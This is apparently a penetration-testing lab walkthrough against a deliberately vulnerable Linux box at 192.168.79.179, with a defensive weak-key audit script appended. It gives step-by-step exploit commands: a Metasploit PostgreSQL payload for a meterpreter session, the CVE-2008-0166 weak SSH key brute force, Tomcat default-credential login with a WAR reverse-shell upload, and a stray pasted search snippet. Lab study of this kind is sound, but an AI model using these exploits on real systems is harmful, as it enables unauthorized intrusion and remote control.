    msf > use exploit/linux/postgres/postgres_payload
    msf exploit(postgres_payload) > set rhost 192.168.79.179
    msf exploit(postgres_payload) > exploit

This gets a meterpreter session.

SSH exploit (port 22):

Getting access to a system with a writeable filesystem

Since nmap shows the OpenSSH version is 4.7, I googled it and found that it uses OpenSSL 0.9.8g.

Search for OpenSSL exploits:

    searchsploit openssl

Looks like these exploits can be used. The vulnerability is CVE-2008-0166.

I use 5720.py.

First, download the precalculated vulnerable keys (wget it):

    tar jxf 5622.tar.bz2

Run the command:

    python 5720.py rsa/2048/ 192.168.79.179 root 22 5

rsa/2048 is the folder that contains the keys.

When keys are found, log in to the box:

    ssh -l root -p22 -i rsa/2048//c551f0a5d2f76d88b58b3ae90ceb617a-22002 192.168.79.179

TELNET exploit

In msfconsole, search telnet.

    msf > use auxiliary/scanner/x11/open_x11
    msf auxiliary(open_x11) > set rhosts 192.168.79.179
    msf auxiliary(open_x11) > run

It shows:

    192.168.79.179:6000 - 192.168.79.179 Access Denied

Now, try to log in to X11 using the telnet username/password:

    ssh -X -l msfadmin 192.168.79.179

Exploit Apache Tomcat (port 8180)

Use Nikto to scan:

    nikto -h 192.168.79.179:8180

A default credential is found: ID ‘tomcat’, PW ‘tomcat’.

Navigate to input the username/password, and we are in.

Same shit: generate and upload a WAR reverse shell backdoor.

Create a webshell called index.jsp (from pentester lab; you may generate it using msfvenom).
Sep 14, 2012 - PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.6p1. PRNG Bruteforce SSH Exploit (Python) /linux/remote/5720.py OpenSSL.

The services are FTP, SSH, MySQL, HTTP, and Telnet. To perform a brute-force attack on these services, we will use auxiliaries of each service. Auxiliaries are small scripts used in Metasploit which don’t create a shell in the victim machine; they just provide access to the machine if the brute-force attack is successful.
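The SSH section above works because CVE-2008-0166 left only a small, enumerable set of possible keys, so the same precalculated list can be used defensively to find weak keys that are still trusted. The following is an added example, not code from the original post: it audits an authorized_keys file against a blocklist of MD5 fingerprints. It assumes the archive's key files are named `<MD5 fingerprint>-<pid>`, as the file name used above suggests; the function names, sample file and key blobs are constructed for illustration.

```python
import base64
import binascii
import hashlib

KEY_TYPES = ("ssh-rsa", "ssh-dss")  # key types this audit looks for

def md5_fingerprint(b64_blob):
    """Legacy MD5 fingerprint (hex, no colons) of a base64 public key blob."""
    return hashlib.md5(base64.b64decode(b64_blob, validate=True)).hexdigest()

def blocklist_from_names(names):
    """Assumption: weak-key files are named '<32-hex MD5 fingerprint>-<pid>'."""
    out = set()
    for name in names:
        stem = name.rsplit("/", 1)[-1].split(".")[0].split("-")[0].lower()
        if len(stem) == 32 and all(c in "0123456789abcdef" for c in stem):
            out.add(stem)
    return out

def audit_authorized_keys(text, weak_fingerprints):
    """Return (line_no, fingerprint, comment) for each blocklisted key."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        # Options such as command="..." may precede the key type, so scan for it.
        for i, field in enumerate(fields[:-1]):
            if field in KEY_TYPES:
                try:
                    fp = md5_fingerprint(fields[i + 1])
                except (binascii.Error, ValueError):
                    break  # malformed blob: skip the entry
                if fp in weak_fingerprints:
                    hits.append((line_no, fp, " ".join(fields[i + 2:])))
                break
    return hits

def make_blob(tag):
    """Constructed stand-in for a key blob (not a real key)."""
    return base64.b64encode(b"\x00\x00\x00\x07ssh-rsa" + tag).decode()

WEAK, GOOD = make_blob(b"constructed-weak"), make_blob(b"constructed-good")
SAMPLE = f"""# constructed sample authorized_keys
ssh-rsa {GOOD} alice@laptop
command="/usr/bin/backup" ssh-rsa {WEAK} root@oldbox
ssh-rsa not*base64 broken@entry
"""
BLOCKLIST = {md5_fingerprint(WEAK)}  # constructed; real lists come from the archive
```

Any key this reports should be removed from authorized_keys and regenerated on a patched system.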